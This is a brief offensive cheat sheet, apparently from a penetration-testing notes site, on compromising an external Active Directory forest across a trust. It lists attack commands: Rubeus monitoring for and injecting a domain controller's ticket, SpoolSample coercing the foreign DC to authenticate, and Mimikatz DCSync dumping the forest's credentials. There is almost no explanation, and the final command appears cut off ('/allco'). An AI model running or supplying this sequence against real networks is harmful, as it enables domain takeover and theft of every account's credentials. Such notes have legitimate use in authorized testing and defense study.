🟢Breaking Forest Trusts

Breaking Forest Trusts with Rubeus

Rubeus.exe monitor /interval:5 /filteruser:target-dc$

Inject the Ticket

Rubeus.exe ptt /ticket:<Base64ValueofCapturedTicket>

Breaking Forest Trusts with SpoolSample

SpoolSample.exe target-dc$.external.forest.local dc.compromised.domain.local

Breaking Forest Trusts with MimiKatz

lsadump::dcsync /domain:external.forest.local /allco

Last updated